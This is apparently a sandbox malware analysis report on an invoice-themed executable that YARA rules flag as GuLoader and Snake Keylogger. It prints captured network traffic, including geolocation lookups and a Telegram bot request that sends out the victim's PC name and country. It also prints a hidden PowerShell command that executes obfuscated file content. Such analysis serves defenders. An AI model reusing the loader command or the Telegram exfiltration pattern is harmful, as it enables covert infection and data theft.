                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30145
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=14k2%2BURhY8EUR4na6Hhgbxp%2F9oZ%2BsO8ntLRtdgb%2Bw7UA7JiQ%2FoVkpiDBBspwfMx50igOQkXWNNYMvT%2BzEgQQUajan6BWaS4EciKyBXmAxO0%2B8BV%2FJiy%2BPkMaE2d4nlizb2LVt%2FHY"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922d96cd44787-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2343&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1232865&cwnd=251&unsent_bytes=0&cid=07d247940a3f3aee&ts=150&x=0"
                                                                                              2024-10-24 10:03:17 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              7192.168.2.2249174188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:19 UTC63OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              2024-10-24 10:03:19 UTC892INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:19 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30147
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BwaDBnSiEAsMpR6r1vuWzUrpI23TOBS%2Bns8uDkDgtUGt5lU4a4XFupEaStdEV0KvpX8KaFZeLCd1adGwO69qVYJAKlurocJc25rgDpa%2B2jcnA0fZkbxXlKvg8rNTSvrHmHyjpKoh"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922e4bfd9ea60-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2264268&cwnd=251&unsent_bytes=0&cid=254c11225a5f3126&ts=261&x=0"
                                                                                              2024-10-24 10:03:19 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              8192.168.2.2249176188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:20 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:20 UTC898INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:20 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30148
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B89pwOp9ATGj6sAOdzPjlfOWtWK552kxiOQn6S%2BijikUSZfuFV01ODaYwVaL9gqpZEn1MUAR4O24Mzo8GkSth5jxsuNme%2B8ixubX5EwNfJLQWEjHoSGGEzNpXF2h7ckuET%2BfCH%2F4"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922eddaec4793-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1849&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1540425&cwnd=251&unsent_bytes=0&cid=911c137e0d5154c6&ts=149&x=0"
                                                                                              2024-10-24 10:03:20 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              9192.168.2.2249178188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:22 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:22 UTC902INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:22 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30150
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GLmkjl3DLvW11myjErzF0M0YlyqdsR59%2ByGb77%2FXq29rIXZCbbRlzut%2FzPoWhPAEf15c4N1YBgMG9%2BRQspthg55gTZm%2BSe7shLqbHoG%2FeZy46YAIbh%2BJzmpLMPWrihwbYuEqbroQ"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d7922fabeef2c92-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1030&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2666666&cwnd=239&unsent_bytes=0&cid=6fde64328a213deb&ts=152&x=0"
                                                                                              2024-10-24 10:03:22 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              10192.168.2.2249180188.114.97.34432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:24 UTC87OUTGET /xml/173.254.250.71 HTTP/1.1
                                                                                              Host: reallyfreegeoip.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:24 UTC900INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 10:03:24 GMT
                                                                                              Content-Type: application/xml
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              access-control-allow-origin: *
                                                                                              vary: Accept-Encoding
                                                                                              Cache-Control: max-age=86400
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 30152
                                                                                              Last-Modified: Thu, 24 Oct 2024 01:40:52 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUm%2FQwUfUQfHUkcqFNHvVs4xlx2zaG37q0HPQNA8j4k3sy9%2BM4Icf0Zt7jk7X1RQUbqWAek3W5jtTis155UY5ZtKw5kbNlmIRgLTzNw%2FuRmhcO80nXv1%2B%2F8G%2BRNd9DYVhfMehyGE"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8d792304095e464e-DFW
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1138&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2445945&cwnd=251&unsent_bytes=0&cid=0deac994d4926cd6&ts=153&x=0"
                                                                                              2024-10-24 10:03:24 UTC366INData Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65
                                                                                              Data Ascii: 167<Response><IP>173.254.250.71</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
                                                                                              2024-10-24 10:03:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              11192.168.2.2249181149.154.167.2204432504C:\Windows\SysWOW64\msiexec.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-10-24 10:03:25 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2010/24/2024%20/%208:39:12%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                              Host: api.telegram.org
                                                                                              Connection: Keep-Alive
                                                                                              2024-10-24 10:03:25 UTC344INHTTP/1.1 404 Not Found
                                                                                              Server: nginx/1.18.0
                                                                                              Date: Thu, 24 Oct 2024 10:03:25 GMT
                                                                                              Content-Type: application/json
                                                                                              Content-Length: 55
                                                                                              Connection: close
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                              2024-10-24 10:03:25 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                              Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                              Click to jump to process

                                                                                              Click to jump to process

                                                                                              Click to dive into process behavior distribution

                                                                                              Click to jump to process

                                                                                              Target ID:0
                                                                                              Start time:06:01:48
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Users\user\Desktop\REVISED INVOICE.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\REVISED INVOICE.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'007'528 bytes
                                                                                              MD5 hash:8274B1A41B53BF35E0B4330A20010D4C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              Target ID:3
                                                                                              Start time:06:01:56
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
                                                                                              Imagebase:0x10c0000
                                                                                              File size:427'008 bytes
                                                                                              MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Target ID:5
                                                                                              Start time:06:02:46
                                                                                              Start date:24/10/2024
                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                              Imagebase:0x8b0000
                                                                                              File size:73'216 bytes
                                                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.629157566.0000000022131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:23.5%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:22.4%
                                                                                                Total number of Nodes:1341
                                                                                                Total number of Limit Nodes:46
                                                                                                execution_graph 4032 402840 4033 402bbf 19 API calls 4032->4033 4035 40284e 4033->4035 4034 402864 4037 405bcf 2 API calls 4034->4037 4035->4034 4036 402bbf 19 API calls 4035->4036 4036->4034 4038 40286a 4037->4038 4060 405bf4 GetFileAttributesW CreateFileW 4038->4060 4040 402877 4041 402883 GlobalAlloc 4040->4041 4042 40291a 4040->4042 4045 402911 CloseHandle 4041->4045 4046 40289c 4041->4046 4043 402922 DeleteFileW 4042->4043 4044 402935 4042->4044 4043->4044 4045->4042 4061 403222 SetFilePointer 4046->4061 4048 4028a2 4049 40320c ReadFile 4048->4049 4050 4028ab GlobalAlloc 4049->4050 4051 4028bb 4050->4051 4052 4028ef 4050->4052 4053 403027 37 API calls 4051->4053 4054 405ca6 WriteFile 4052->4054 4055 4028c8 4053->4055 4056 4028fb GlobalFree 4054->4056 4058 4028e6 GlobalFree 4055->4058 4057 403027 37 API calls 4056->4057 4059 40290e 4057->4059 4058->4052 4059->4045 4060->4040 4061->4048 4062 401cc0 4063 402ba2 19 API calls 4062->4063 4064 401cc7 4063->4064 4065 402ba2 19 API calls 4064->4065 4066 401ccf GetDlgItem 4065->4066 4067 402531 4066->4067 4068 4029c0 4069 402ba2 19 API calls 4068->4069 4070 4029c6 4069->4070 4071 4029d4 4070->4071 4072 4029f9 4070->4072 4074 40281e 4070->4074 4071->4074 4076 405f66 wsprintfW 4071->4076 4073 406041 19 API calls 4072->4073 4072->4074 4073->4074 4076->4074 3082 401fc3 3083 401fd5 3082->3083 3084 402087 3082->3084 3102 402bbf 3083->3102 3086 401423 26 API calls 3084->3086 3093 4021e1 3086->3093 3088 402bbf 19 API calls 3089 401fe5 3088->3089 3090 401ffb LoadLibraryExW 3089->3090 3091 401fed GetModuleHandleW 3089->3091 3090->3084 3092 40200c 3090->3092 3091->3090 3091->3092 3108 406464 WideCharToMultiByte 3092->3108 3096 402056 3114 40517e 3096->3114 3097 40201d 3100 40202d 3097->3100 3111 401423 3097->3111 3100->3093 3101 402079 FreeLibrary 3100->3101 3101->3093 3103 402bcb 3102->3103 3125 406041 3103->3125 3106 401fdc 3106->3088 3109 402017 3108->3109 3110 40648e GetProcAddress 3108->3110 3109->3096 3109->3097 3110->3109 3112 40517e 26 API calls 3111->3112 3113 401431 3112->3113 3113->3100 3115 405199 3114->3115 3116 40523b 3114->3116 3117 4051b5 lstrlenW 3115->3117 3118 406041 19 API calls 3115->3118 3116->3100 3119 4051c3 lstrlenW 3117->3119 3120 4051de 3117->3120 3118->3117 3119->3116 3121 4051d5 lstrcatW 3119->3121 3122 4051f1 3120->3122 3123 4051e4 SetWindowTextW 3120->3123 3121->3120 3122->3116 3124 4051f7 SendMessageW SendMessageW SendMessageW 3122->3124 3123->3122 3124->3116 3126 40604e 3125->3126 3127 406299 3126->3127 3130 406101 GetVersion 3126->3130 3131 406267 lstrlenW 3126->3131 3133 406041 10 API calls 3126->3133 3136 40617c GetSystemDirectoryW 3126->3136 3137 40618f GetWindowsDirectoryW 3126->3137 3138 4062b3 5 API calls 3126->3138 3139 406208 lstrcatW 3126->3139 3140 406041 10 API calls 3126->3140 3141 4061c3 SHGetSpecialFolderLocation 3126->3141 3142 4061b0 SHGetFolderPathW 3126->3142 3153 405eec RegOpenKeyExW 3126->3153 3158 405f66 wsprintfW 3126->3158 3159 40601f lstrcpynW 3126->3159 3128 402bec 3127->3128 3160 40601f lstrcpynW 3127->3160 3128->3106 3144 4062b3 3128->3144 3130->3126 3131->3126 3133->3131 3136->3126 3137->3126 3138->3126 3139->3126 3140->3126 3141->3126 3143 4061db SHGetPathFromIDListW CoTaskMemFree 3141->3143 3142->3126 3142->3141 3143->3126 3150 4062c0 3144->3150 3145 406336 3146 40633b CharPrevW 3145->3146 3148 40635c 3145->3148 3146->3145 3147 406329 CharNextW 3147->3145 3147->3150 3148->3106 3150->3145 3150->3147 3151 406315 CharNextW 3150->3151 3152 406324 CharNextW 3150->3152 3161 405a00 3150->3161 3151->3150 3152->3147 3154 405f60 3153->3154 3155 405f20 RegQueryValueExW 3153->3155 3154->3126 3156 405f41 RegCloseKey 3155->3156 3156->3154 3158->3126 3159->3126 3160->3128 3162 405a06 3161->3162 3163 405a1c 3162->3163 3164 405a0d CharNextW 3162->3164 3163->3150 3164->3162 4077 4016c4 4078 402bbf 19 API calls 4077->4078 4079 4016ca GetFullPathNameW 4078->4079 4082 4016e4 4079->4082 4086 401706 4079->4086 4080 40171b GetShortPathNameW 4081 402a4c 4080->4081 4083 406362 2 API calls 4082->4083 4082->4086 4084 4016f6 4083->4084 4084->4086 4087 40601f lstrcpynW 4084->4087 4086->4080 4086->4081 4087->4086 4098 40194e 4099 402bbf 19 API calls 4098->4099 4100 401955 lstrlenW 4099->4100 4101 402531 4100->4101 4102 4027ce 4103 4027d6 4102->4103 4104 4027da FindNextFileW 4103->4104 4105 4027ec 4103->4105 4104->4105 4106 402833 4104->4106 4108 40601f lstrcpynW 4106->4108 4108->4105 4109 401754 4110 402bbf 19 API calls 4109->4110 4111 40175b 4110->4111 4112 405c23 2 API calls 4111->4112 4113 401762 4112->4113 4113->4113 4114 4048d4 4115 404900 4114->4115 4116 4048e4 4114->4116 4118 404933 4115->4118 4119 404906 SHGetPathFromIDListW 4115->4119 4125 405748 GetDlgItemTextW 4116->4125 4121 40491d SendMessageW 4119->4121 4122 404916 4119->4122 4120 4048f1 SendMessageW 4120->4115 4121->4118 4123 40140b 2 API calls 4122->4123 4123->4121 4125->4120 4126 401d56 GetDC GetDeviceCaps 4127 402ba2 19 API calls 4126->4127 4128 401d74 MulDiv ReleaseDC 4127->4128 4129 402ba2 19 API calls 4128->4129 4130 401d93 4129->4130 4131 406041 19 API calls 4130->4131 4132 401dcc CreateFontIndirectW 4131->4132 4133 402531 4132->4133 3835 4014d7 3840 402ba2 3835->3840 3837 4014dd Sleep 3839 402a4c 3837->3839 3841 406041 19 API calls 3840->3841 3842 402bb6 3841->3842 3842->3837 4141 401a57 4142 402ba2 19 API calls 4141->4142 4143 401a5d 4142->4143 4144 402ba2 19 API calls 4143->4144 4145 401a05 4144->4145 4146 40155b 4147 4029f2 4146->4147 4150 405f66 wsprintfW 4147->4150 4149 4029f7 4150->4149 3969 401ddc 3970 402ba2 19 API calls 3969->3970 3971 401de2 3970->3971 3972 402ba2 19 API calls 3971->3972 3973 401deb 3972->3973 3974 401df2 ShowWindow 3973->3974 3975 401dfd EnableWindow 3973->3975 3976 402a4c 3974->3976 3975->3976 3987 401bdf 3988 402ba2 19 API calls 3987->3988 3989 401be6 3988->3989 3990 402ba2 19 API calls 3989->3990 3991 401bf0 3990->3991 3992 401c00 3991->3992 3993 402bbf 19 API calls 3991->3993 3994 401c10 3992->3994 3995 402bbf 19 API calls 3992->3995 3993->3992 3996 401c1b 3994->3996 3997 401c5f 3994->3997 3995->3994 3998 402ba2 19 API calls 3996->3998 3999 402bbf 19 API calls 3997->3999 4000 401c20 3998->4000 4001 401c64 3999->4001 4002 402ba2 19 API calls 4000->4002 4003 402bbf 19 API calls 4001->4003 4004 401c29 4002->4004 4005 401c6d FindWindowExW 4003->4005 4006 401c31 SendMessageTimeoutW 4004->4006 4007 401c4f SendMessageW 4004->4007 4008 401c8f 4005->4008 4006->4008 4007->4008 4151 4022df 4152 402bbf 19 API calls 4151->4152 4153 4022ee 4152->4153 4154 402bbf 19 API calls 4153->4154 4155 4022f7 4154->4155 4156 402bbf 19 API calls 4155->4156 4157 402301 GetPrivateProfileStringW 4156->4157 4158 401960 4159 402ba2 19 API calls 4158->4159 4160 401967 4159->4160 4161 402ba2 19 API calls 4160->4161 4162 401971 4161->4162 4163 402bbf 19 API calls 4162->4163 4164 40197a 4163->4164 4165 40198e lstrlenW 4164->4165 4170 4019ca 4164->4170 4166 401998 4165->4166 4166->4170 4171 40601f lstrcpynW 4166->4171 4168 4019b3 4169 4019c0 lstrlenW 4168->4169 4168->4170 4169->4170 4171->4168 4172 401662 4173 402bbf 19 API calls 4172->4173 4174 401668 4173->4174 4175 406362 2 API calls 4174->4175 4176 40166e 4175->4176 4177 4066e3 4181 406567 4177->4181 4178 406ed2 4179 4065f1 GlobalAlloc 4179->4178 4179->4181 4180 4065e8 GlobalFree 4180->4179 4181->4178 4181->4179 4181->4180 4182 406668 GlobalAlloc 4181->4182 4183 40665f GlobalFree 4181->4183 4182->4178 4182->4181 4183->4182 4184 4019e4 4185 402bbf 19 API calls 4184->4185 4186 4019eb 4185->4186 4187 402bbf 19 API calls 4186->4187 4188 4019f4 4187->4188 4189 4019fb lstrcmpiW 4188->4189 4190 401a0d lstrcmpW 4188->4190 4191 401a01 4189->4191 4190->4191 4192 4025e5 4193 402ba2 19 API calls 4192->4193 4194 4025f4 4193->4194 4195 40263a ReadFile 4194->4195 4196 405c77 ReadFile 4194->4196 4198 40267a MultiByteToWideChar 4194->4198 4199 40272f 4194->4199 4201 4026a0 SetFilePointer MultiByteToWideChar 4194->4201 4202 402740 4194->4202 4204 40272d 4194->4204 4205 405cd5 SetFilePointer 4194->4205 4195->4194 4195->4204 4196->4194 4198->4194 4214 405f66 wsprintfW 4199->4214 4201->4194 4203 402761 SetFilePointer 4202->4203 4202->4204 4203->4204 4206 405cf1 